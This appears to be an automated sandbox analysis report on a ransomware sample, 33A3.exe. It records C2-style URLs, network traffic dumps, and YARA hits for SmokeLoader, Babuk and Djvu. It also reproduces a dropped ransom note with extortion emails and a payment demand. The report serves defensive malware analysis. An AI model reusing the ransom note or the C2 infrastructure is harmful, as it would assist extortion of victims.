0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 5e 39 5c a2 f3 df fc fc 48 eb 0b db 69 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82O^9\HiSG0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 47 a4 e8 dd e1 e4 40 f0 4f 91 64 b2 45 48 95 01 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:G@OdEH10
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc ab 15 b0 08 db 6f a7 18 5c 9b 08 bf eb 3b af 2d 50 0a f3 dd c6 5b ee 52 c6 41 83 aa 76 d2 26 eb b2 c7 18 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 41I:82OTeo\;-P[RAv&~0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 de 15 49 39 41 a3 e8 dd e1 f8 5f f5 4a 89 2d bb 53 51 90 4a fb ef 2c f3 2b 42 1a ae b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OI9A_J-SQJ,+BW0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 63 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 53 da 46 d4 f7 20 86 24 e6 ad 90 52 23 e5 b4 4c 2b f8 a5 b4 6a f6 99 bc 5d af 72 94 cb 32 45 5d 39 0f 4e df a1 3d fd d4 55 84 ac c8 42 c6 36 9d 95 69 77 64 f9 7a 3a 9c c6 9d c6 76 ed 39 08 84 5a b0 4d e3 e6 d3 36 81 c7 fc 3f d7 38 f9 fb 91 e0 01 83 c4 c3 4c 1c c3 03 ae eb b4 c0 a9 ac 4f 1c ff 74 88 d8 29 82 7b 32 45 b6 88 f9 b7 ae 1a b1 4b 64 c0 c6 ba e2 d9 ba 78 d6 27 35 60 3a 6a e8 81 03 9d 78 ab a8 af 2d 90 d6 d7 44 0d 0a 30 0d 0a 0d 0a Data Ascii: c1I:82OB%,YR("XSF $R#L+j]r2E]9N=UB6iwdz:v9ZM6?8LOt){2EKdx'5`:jx-D0

Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54-D
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54KS
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54L
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54e
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.phpw
Source: explorer.exe, 00000002.00000000.2046328419.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 33A3.exe, 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2049221866.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2048376120.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2048773161.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2048794646.0000000008890000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 33A3.exe, 00000010.00000003.2557600248.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000002.00000000.2051763871.000000000C8E8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 33A3.exe, 00000010.00000003.2558316744.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: 33A3.exe, 00000010.00000003.2558504781.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: 33A3.exe, 00000010.00000003.2558685731.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 33A3.exe, 00000010.00000003.2558807456.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: 33A3.exe, 00000010.00000003.2558921582.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: 33A3.exe, 00000010.00000003.2559017569.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: 33A3.exe, 00000010.00000003.2559114058.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000002.00000000.2051021521.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2047730753.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: 33A3.exe, 00000009.00000002.2422986001.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.0000000000650000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629615392.000000000061A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2628287801.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: 33A3.exe, 00000009.00000002.2422986001.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/6
Source: 33A3.exe, 00000017.00000002.2543892568.000000000074A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/gK
Source: 33A3.exe, 33A3.exe, 0000000E.00000002.2443241260.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.000000000074A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629615392.000000000061A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2628287801.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json5
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json7
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonM
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonW
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonat
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsondll
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsondll7
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsoniu
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsoni~
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonn~
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonq
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/q
Source: 33A3.exe, 0000001A.00000002.2629615392.000000000061A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2628287801.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/s
Source: 33A3.exe, 00000017.00000002.2543892568.000000000074A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/sK
Source: explorer.exe, 00000002.00000000.2049221866.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3016685180.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3007904273.00000000085A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001E.00000003.3009500853.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3016685180.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3007904273.00000000085A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/)
Source: explorer.exe, 0000001E.00000003.3013299726.00000000085E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000001E.00000003.3004817424.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.0000000008423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.2047025434.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 0000001E.00000003.3029743671.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000001E.00000003.3016685180.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3007904273.0000000008636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comQkL
Source: explorer.exe, 00000002.00000000.2051021521.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: 33A3.exe, 00000010.00000002.3253450343.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp, _readme.txt0.16.dr, _readme.txt.16.dr	String found in binary or memory: https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73
Source: explorer.exe, 00000002.00000000.2049221866.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2049221866.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50438
Source: unknown	Network traffic detected: HTTP traffic on port 50470 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50441 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50442 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50461
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50441
Source: unknown	Network traffic detected: HTTP traffic on port 50461 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50474
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50451
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50454
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50431
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50442
Source: unknown	Network traffic detected: HTTP traffic on port 50454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50470
Source: unknown	Network traffic detected: HTTP traffic on port 50431 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50451 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50474 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50438 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50431 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50438 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50441 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.5:50442 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50451 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.5:50454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50461 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:50470 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:50474 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

9_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\Users\user\AppData\Local\VirtualStore\_readme.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0871PsawqS8Dvoqx3bvfv1GNOXwQLrS9NhK8A5BueudpVlCvCw

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match

File source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE
